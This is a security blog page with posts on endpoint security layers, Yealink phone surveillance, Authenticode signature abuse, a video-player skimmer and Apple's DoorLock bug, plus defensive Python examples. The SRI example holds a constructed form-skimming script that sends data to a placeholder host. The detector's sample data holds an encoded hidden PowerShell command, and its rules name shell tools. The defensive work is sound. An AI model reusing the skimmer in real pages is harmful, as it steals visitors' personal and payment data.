All posts by mitch tanenbaum

The Layers of Effective Endpoint Security

As hackers become smarter, generate more and more effective attacks, and users continue to work from almost anywhere, IT teams have to get smarter about endpoint security. That takes a layered approach, which includes moving towards zero trust. Here are some recommendations.

  1. Signature and heuristic-based detection – this is what traditional endpoint protection (AKA anti-virus and anti-malware) has used for years. Historically, this is where endpoint protection stopped. Now it is where it starts.
  2. Contextual detection – this is where machine learning comes in. Even with unknown malware, ransomware and other bad stuff, looking at the context of what is being done (which process, started by what, touching which files) lets you detect activity that is out of the ordinary.
  3. Anti-exploit technology – continuous monitoring aimed at blocking zero-days, fileless malware and more. This requires technology that can track the actions taken by every process and look for anomalies.
  4. Add the cloud to the mix – now that you have all of this data from every endpoint in the enterprise (end users, servers, the corporate cloud and the public cloud), what do you do with it? You need a set of tools that can analyze that data in real time, mix in threat intelligence from other sources, likely add a pinch of human analysis, and then feed the result back to each endpoint so that it can adjust its protection techniques. (Note that the referenced article at the end says that only one vendor does this. That is actually not true. I am sure that only one vendor does it in the very particular way they do it, but that doesn’t mean that many other vendors don’t do the same thing in their own way.)
  5. Threat hunting service – this is where the humans come in, and it takes specialized expertise: people who look at the data coming from the endpoints and make sense of it. It is certainly possible that you are the only company on the planet being hacked in a particular way – but I seriously doubt it. Even if that were true, the techniques hackers use are often reused, allowing an experienced threat hunter to detect those patterns.
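As an added example (not code from the article or from any vendor), here is a toy detector that stacks the first two layers over a constructed stream of process and file events: an exact-hash signature check, then context rules (an Office application spawning a shell, encoded PowerShell, and a burst of file writes by one process). The event schema, hashes, rule lists and thresholds are all made up for the demonstration. It shows the point of layer 2: the dropped binary is caught by its hash, but the macro-spawned PowerShell and the encryption burst would be missed by the signature layer alone.

```python
"""Toy two-layer endpoint detector: a signature (hash) layer followed by a contextual
layer over a stream of process and file events.  Added example for this post, not
code from any vendor; the event schema, hashes, rules and thresholds are constructed."""
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Event:
    ts: float                 # seconds, monotonic within the sample
    host: str
    pid: int
    kind: str                 # "process" (start) or "file_write"
    image: str = ""           # executable name, lower case
    parent_image: str = ""
    cmdline: str = ""
    sha256: str = ""          # hex digest of the image (constructed values below)
    path: str = ""            # for file_write events


# Layer 1: a signature list.  Hashes here are constructed placeholders.
KNOWN_BAD_SHA256 = {"a" * 64: "Constructed.TestMalware"}

# Layer 2: context rules.  Lists are illustrative, not exhaustive.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


class LayeredDetector:
    def __init__(self, burst_count: int = 50, burst_window: float = 10.0):
        self.burst_count = burst_count        # file writes by one process ...
        self.burst_window = burst_window      # ... within this many seconds
        self.writes = defaultdict(deque)      # (host, pid) -> timestamps of recent writes
        self.burst_fired = set()              # alert once per process

    def signature_layer(self, ev: Event) -> List[str]:
        """Exact match against known-bad hashes: cheap, but blind to anything new."""
        name = KNOWN_BAD_SHA256.get(ev.sha256)
        return [f"signature:{name}"] if name else []

    def context_layer(self, ev: Event) -> List[str]:
        """Look at what the process is doing and who started it, not at what it is."""
        alerts = []
        if ev.kind == "process":
            if ev.parent_image in OFFICE_APPS and ev.image in SHELLS:
                alerts.append("context:office-app-spawned-shell")
            if ev.image == "powershell.exe" and "-enc" in ev.cmdline.lower():
                alerts.append("context:encoded-powershell")
        elif ev.kind == "file_write":
            key = (ev.host, ev.pid)
            window = self.writes[key]
            window.append(ev.ts)
            while window and ev.ts - window[0] > self.burst_window:
                window.popleft()          # drop writes that fell out of the window
            if len(window) >= self.burst_count and key not in self.burst_fired:
                self.burst_fired.add(key)
                alerts.append(f"context:mass-file-write({len(window)} files in {self.burst_window:g}s)")
        return alerts

    def process(self, ev: Event) -> List[str]:
        return self.signature_layer(ev) + self.context_layer(ev)


def run(events: List[Event], **kwargs) -> List[Tuple[float, str, int, List[str]]]:
    """Feed events in time order; return (ts, host, pid, alerts) for every event that alerted."""
    det = LayeredDetector(**kwargs)
    findings = []
    for ev in sorted(events, key=lambda e: e.ts):
        alerts = det.process(ev)
        if alerts:
            findings.append((ev.ts, ev.host, ev.pid, alerts))
    return findings


# Constructed sample telemetry: a macro document spawns encoded PowerShell, which drops
# a binary whose hash is on the signature list, which then encrypts a folder.
SAMPLE_EVENTS = [
    Event(1.0, "ws-17", 100, "process", "winword.exe", "explorer.exe", "WINWORD.EXE invoice.docm", "b" * 64),
    Event(2.0, "ws-17", 200, "process", "powershell.exe", "winword.exe",
          "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA", "c" * 64),
    Event(3.0, "ws-17", 300, "process", "update.exe", "powershell.exe", "update.exe", "a" * 64),
    Event(4.0, "ws-17", 400, "process", "svchost.exe", "services.exe", "svchost.exe -k netsvcs", "d" * 64),
    Event(5.0, "ws-17", 400, "file_write", path="C:/Windows/Temp/cache.dat"),
] + [
    Event(10.0 + i * 0.05, "ws-17", 300, "file_write", path=f"C:/Users/alice/Documents/doc{i}.docx.locked")
    for i in range(60)
]

if __name__ == "__main__":
    for ts, host, pid, alerts in run(SAMPLE_EVENTS):
        print(f"{ts:7.2f} {host} pid={pid} {', '.join(alerts)}")
```

Run as-is it prints three findings: the encoded PowerShell spawned from Word (context only), the dropper (signature only) and the write burst (context only). The same sixty writes spread over a minute produce nothing, which is the trade-off every contextual rule carries: thresholds and windows are where the false positives and the misses both live.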

Doing this is not simple and, unfortunately, not cheap. We have reviewed a lot of tools and have found the best and the brightest. And the most cost-effective. You can also do this incrementally, because you are going to have to integrate IT business processes to make this effective.

However, if you don’t start, you will never get there.

The hackers are not going to wait for you. Unfortunately.

Credit: CSO Online

The Latest Supply Chain Risk – Your Desk Phone

Senator Chris Van Hollen (Maryland) wrote a letter to Commerce Secretary Raimondo asking what she planned to do about this security vulnerability – the first most of us are hearing about it. Raimondo could ban the equipment, just as equipment made by Huawei and others has been banned.

Chinese electronics maker Yealink is not a household word like Huawei, but it may soon be.

Yealink’s phones are, apparently, popular in the United States, including at government agencies – federal, state and local – but they come with just a few security concerns.

Van Hollen’s letter references a report by Virginia-based Chain Security, a firm that scopes out hardware supply chain risk for a living.

The report says that Yealink’s Device Management Platform, or DMP, is what allows users to make calls and administrators to manage the phones.

HOWEVER, it also allows Yealink to secretly record those calls and, for computer-based phones, to track which websites users are visiting.

Concerned yet?

It turns out that even if you are using a physical phone, if your computer reaches the network through the phone, the phone can still track which websites you are visiting. Actually, “can track” is the wrong phrase; “is tracking” is closer to it.

While it is not known for certain, it is suspected that Yealink holds a sysadmin role on the DMP, and hence has the power to do anything that any other admin can do.

Yealink’s service agreement requires users (like a US Government employee with one of their phones on his or her desk) to accept China’s laws, including a term that allows for active monitoring of users when required by the ‘national interest’ of China.

Yealink also does not digitally sign the phone’s software updates, so if someone can convince the phone to accept an update, it has no way of knowing whether that update is legitimate.

Even scarier is Verizon’s response to this revelation: A Verizon spokesperson said Yealink’s DMP “has been built to meet the custom requirements of Verizon” and that the customization was related to “security; feature management exposure to the devices through the DMP; firmware management and remote diagnostics.”

Does that mean that Verizon is in cahoots with China?

If all of this wasn’t bad enough, the phone sends encrypted messages to China three times a day.

The Commerce Department responded to the Senator saying that they take this stuff seriously.

Whatever the hell that means.

My guess is that this is probably not a lot different than other tech that may be in your office or home – which means that you might want to be more aggressive in reviewing the security of those tech toys.

Credit: Defense One

Security News for the Week Ending January 7, 2022

Software released by Microsoft and other vendors is digitally signed so that users can validate that it really came from the vendor in question and that it has not been modified since the vendor created it.

However, hackers have figured out how to bypass the security provided by Microsoft’s digital signature verification process, allowing them to add malware while leaving the signature intact.

According to security firm Check Point, here is how the malware they detected works. The problem, however, is much bigger than this one campaign. Now that the technique is public, it could be used to modify any already-signed software while leaving the signature intact.

This particular attack begins by installing Atera software on a victim’s machine. Atera is a legitimate remote management product (like Kaseya, which was compromised last year) used by Managed Service Providers (MSPs). In this case, the victim did not know they were installing Atera; they thought they were installing a Java update.

Check Point is still trying to figure out exactly how the Atera software was deployed in this case, but in earlier cases the hacker played a short clip of adult content and then told the victim they needed to install this Java update, which was really the malware.

Once the Atera software is on the victim’s computer, the hacker tells Atera to download and run two batch files. One changes Windows Defender’s preferences so that it does not check certain folders and file types, and the other installs the malware.

Next, the attacker runs MSHTA with a particular signed DLL as the parameter. The catch is that malicious script had been appended to the DLL. Due to an oversight by Microsoft, appending the script does not invalidate the signature: the Authenticode hash does not cover the part of the file where the signature itself lives, so data tucked in there goes unnoticed.

Microsoft FIXED this bug in 2013 – that’s right, nine years ago – but backed the fix out in 2014 after discovering that it broke some customers’ software. Microsoft, in its constant effort to be customer friendly, decided to leave its customers’ security compromised rather than tell them to re-sign their software.

Now that decision is coming back to bite them in the ….. (fill in the blank).

It looks like the way they disabled it was to change the fix (for CVE-2013-3900, along with the related CVE-2012-0151 and CVE-2020-1599) from on by default to opt-in, enabled through a registry setting. As a result, most users do not have it turned on.

The fix is to turn the stricter check on, understanding that it might break some software: Microsoft Security Advisory 2915720 | Microsoft Docs.
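To make the “oversight” concrete, here is an added example (not Check Point’s or Microsoft’s code) that parses a PE file’s certificate table and reports what sits after the PKCS#7 SignedData inside the WIN_CERTIFICATE structure. The Authenticode hash deliberately excludes the certificate table, so bytes appended there change neither the hash nor the signature; the 2013 fix makes Windows reject anything other than zero padding in that spot. The sample PE and PKCS#7 blob are constructed (no code, no real certificate) so that it runs offline.

```python
"""Check a PE file's Authenticode certificate table for bytes sitting after the PKCS#7
SignedData structure.  Added example, not Check Point's or Microsoft's code.  The
Authenticode hash skips the certificate table itself, so anything appended inside the
WIN_CERTIFICATE blob (such as a script) leaves the signature valid unless the
EnableCertPaddingCheck fix from MS13-098 / Advisory 2915720 is turned on."""
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4      # index of the certificate-table data directory
WIN_CERT_REVISION_2_0 = 0x0200
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002


def der_total_length(buf: bytes, offset: int = 0) -> int:
    """Total size (tag + length bytes + content) of the DER SEQUENCE at offset."""
    if buf[offset] != 0x30:
        raise ValueError("PKCS#7 blob does not start with a SEQUENCE")
    first = buf[offset + 1]
    if first < 0x80:                                   # short-form length
        return 2 + first
    n = first & 0x7F                                   # long form: n bytes of length follow
    if n == 0 or n > 4:
        raise ValueError("unsupported DER length encoding")
    content_len = int.from_bytes(buf[offset + 2:offset + 2 + n], "big")
    return 2 + n + content_len


def security_directory(pe: bytes):
    """(file offset, size) of the certificate table, or None if the file is unsigned."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt_hdr = e_lfanew + 4 + 20                        # past "PE\0\0" and the COFF header
    magic = struct.unpack_from("<H", pe, opt_hdr)[0]
    dd_base = {0x10B: 96, 0x20B: 112}.get(magic)       # data directories: PE32 / PE32+
    if dd_base is None:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    off, size = struct.unpack_from("<II", pe, opt_hdr + dd_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    return (off, size) if off and size else None     # for this directory the "RVA" is a file offset


def check_authenticode_padding(pe: bytes) -> dict:
    """Report how many bytes follow the SignedData inside the first WIN_CERTIFICATE.
    Zero padding up to the 8-byte boundary is normal; anything else is what the
    opt-in fix rejects and what the attack described above relies on."""
    sd = security_directory(pe)
    if sd is None:
        return {"signed": False, "suspicious": False}
    off, size = sd
    dw_length, revision, cert_type = struct.unpack_from("<IHH", pe, off)
    if dw_length < 8 or dw_length > size:
        raise ValueError("WIN_CERTIFICATE length inconsistent with the data directory")
    blob = pe[off + 8:off + dw_length]                 # bCertificate
    der_len = der_total_length(blob)
    trailing = blob[der_len:]
    return {
        "signed": True,
        "revision": revision,
        "cert_type": cert_type,
        "win_certificate_length": dw_length,
        "pkcs7_length": der_len,
        "trailing_bytes": len(trailing),
        "trailing_all_zero": not any(trailing),
        "suspicious": any(trailing),
    }


def build_sample_pe(pkcs7: bytes, appended: bytes = b"") -> bytes:
    """Constructed minimal PE32 with one WIN_CERTIFICATE; no code, no real certificate."""
    cert_body = pkcs7 + appended
    dw_length = (8 + len(cert_body) + 7) & ~7          # dwLength is rounded up to 8 bytes
    win_cert = struct.pack("<IHH", dw_length, WIN_CERT_REVISION_2_0, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + cert_body
    win_cert += b"\0" * (dw_length - len(win_cert))    # alignment padding, all zero
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)   # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 94        # PE32 magic, remaining fields zeroed
    dirs = bytearray(16 * 8)
    cert_offset = 64 + 4 + 20 + 224                    # certificate table right after the headers
    struct.pack_into("<II", dirs, 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, cert_offset, dw_length)
    return dos + coff + opt + bytes(dirs) + win_cert


# Constructed stand-in for a PKCS#7 SignedData: SEQUENCE { OCTET STRING of 128 bytes }
SAMPLE_PKCS7 = b"\x30\x81\x83" + b"\x04\x81\x80" + b"\xAA" * 128

if __name__ == "__main__":
    print("clean:   ", check_authenticode_padding(build_sample_pe(SAMPLE_PKCS7)))
    print("tampered:", check_authenticode_padding(build_sample_pe(SAMPLE_PKCS7, b"<script>run('calc')</script>")))
```

The clean sample reports two trailing bytes, all zero (alignment padding); the one with a script appended reports 34 non-zero trailing bytes and is flagged. On a real machine the equivalent check is enabled by setting the REG_SZ value EnableCertPaddingCheck to "1" under HKLM\Software\Microsoft\Cryptography\Wintrust\Config (and under HKLM\Software\Wow6432Node\Microsoft\Cryptography\Wintrust\Config on 64-bit Windows) and rebooting, per Advisory 2915720; test it on a pilot group first, because anything that is signed the sloppy way will stop verifying.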

Credit: MSN and Dark Reading

Supply Chain Attacks Are Rampant

Today’s supply chain attack is interesting. I guess I can say that because it didn’t happen to a web site that I own and my information didn’t get stolen.

Here is the situation. Many web sites have embedded videos. In this case, most of the affected sites were real estate web sites, which often have virtual tour videos on the page. In order to play a video, you need a video player. There are many video players to choose from, but what almost no one does is write their own.

Palo Alto Networks found over a hundred web sites, many or most of them (depending on which story you read) belonging to the real estate firm Sotheby’s.

What happened? Somehow a malicious version of the video player got loaded onto these web sites. When a visitor went to one of the sites, the video player code was downloaded to the visitor’s computer. In this case, the malware was a data skimmer, which steals the information that the user provides to the website. It could be name and address information or it could be credit card information. Either can be used for social engineering or financial crimes.

The malware is polymorphic, meaning that no two copies of it are the same, which makes it difficult to detect and block. The code is also obfuscated, which makes it difficult to read and understand, so even if you tried to figure out whether it was malicious, it is unlikely that you could.

Now that this particular attack has become public, hackers all over the world are going to copy it. All it takes is a web site hosting shared code with lax security. The hacker compromises the code and waits for developers to pull it in.

This is not at all limited to video players, even though there are thousands of them. Any bit of shared code that is hosted in the cloud and linked to by developers is a valid target.

This means that you need to have a robust software supply chain risk management program in place, unless you want to be like these firms, dealing with a shattered reputation.
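One concrete control for this class of attack, which the post does not name, is Subresource Integrity (SRI): the page pins the hash of the third-party script it expects, and the browser refuses to run anything that hashes differently, polymorphic or not. The added example below (not from the post, Palo Alto Networks or Sotheby’s) computes the pin, emits the tag and applies the browser’s matching rule; the player script, the skimmer payload and the cdn.example URL are constructed stand-ins.

```python
"""Subresource Integrity (SRI) as a guard against a swapped third-party script.  Added
example, not from the article or Palo Alto Networks; SRI is the browser mechanism
for this problem and is not named in the post.  The player script and skimmer
payload below are constructed stand-ins, and "https://cdn.example/player.js" is a
placeholder URL."""
import base64
import hashlib
import hmac

SRI_ALGOS = ("sha256", "sha384", "sha512")          # the only algorithms browsers accept, weakest first


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """'sha384-<base64 digest>' token for the exact bytes the browser will receive."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """Pinned <script> tag; crossorigin is required for SRI on cross-origin resources.
    The weak form is the same tag with no integrity attribute at all."""
    return f'<script src="{src}" integrity="{sri_hash(content)}" crossorigin="anonymous"></script>'


def verify_sri(content: bytes, integrity: str) -> bool:
    """Apply the browser's rule: keep only tokens of the strongest algorithm present,
    then pass if any of those matches.  A weaker matching token does not rescue a
    resource whose stronger token fails."""
    tokens = []
    for token in integrity.split():
        algo, _, _ = token.partition("-")
        if algo in SRI_ALGOS:
            tokens.append((SRI_ALGOS.index(algo), algo, token))
    if not tokens:
        return False                                  # no usable metadata: treat as unpinned
    strongest = max(rank for rank, _, _ in tokens)
    for rank, algo, token in tokens:
        if rank == strongest and hmac.compare_digest(sri_hash(content, algo), token):
            return True
    return False


# Constructed: the player as shipped, and the same file with a skimmer appended.
PLAYER_JS = b"(function(){window.Player={play:function(el){el.play();}};})();\n"
SKIMMER_JS = (b"(function(){document.addEventListener('submit',function(e){"
              b"new Image().src='https://collect.example/?d='+encodeURIComponent("
              b"new URLSearchParams(new FormData(e.target)).toString());});})();\n")
SKIMMED_JS = PLAYER_JS + SKIMMER_JS


def demo() -> dict:
    """Pin the clean player, then check both copies against the pin."""
    pin = sri_hash(PLAYER_JS)
    return {
        "tag": script_tag("https://cdn.example/player.js", PLAYER_JS),
        "clean_ok": verify_sri(PLAYER_JS, pin),
        "skimmed_ok": verify_sri(SKIMMED_JS, pin),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

SRI only helps where your page references a fixed file: scripts that the player itself fetches at run time are outside its reach, and the pin has to be refreshed every time the vendor legitimately ships a new version, which is exactly the review step a supply chain program should force rather than let a silent update slide through.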

If you need help with this, please contact us.

Credit: Threatpost and Bleeping Computer

Apple iOS in the Doghouse Again

iOS devices running 14.7 through 15.2 – basically all current devices – are subject to a denial of service attack that forces the user to do a factory reset, wiping all of the user’s data.

If the user signs in to iCloud to restore the data, the denial of service replays once the data is restored, resulting in a “rinse and repeat” cycle.

Apple was told about the bug last August but has not mitigated it. As a result, the researcher who discovered it has publicly disclosed it and created a proof of concept app to demonstrate it.

Apple has repeatedly said that they would fix it, but have not.

The bug is in HomeKit, Apple’s home automation software, and apparently it does not matter whether you use any home automation at all. If the hacker manages to set a HomeKit device name of more than 500,000 characters, which can be done in a number of ways, the iDevice goes into cardiac arrest.

For more technical details on how the attack works, read the article at the link.

Since all good attacks need a catchy name, this one is called DoorLock.

Apple did quietly add a partial mitigation in 15.1, if you know about it and use it: there is a way to limit the device name length, but it is not set by default (why?). My guess is that maybe a half dozen Apple employees have set this to protect themselves.

One bright spot is that the hacker would either need access to your HomeKit “home” or need to get you to manually accept an invitation to one. The second seems easier than the first, using a pretty vanilla social engineering scam.

If you don’t have your data backed up, you are, as they say, in a world of trouble.

There is a way, if you know what is going on, to mitigate the “rinse and repeat” loop to restore your data from iCloud, so all is not lost, but it could be very stressful.

You are now warned.

Credit: Bleeping Computer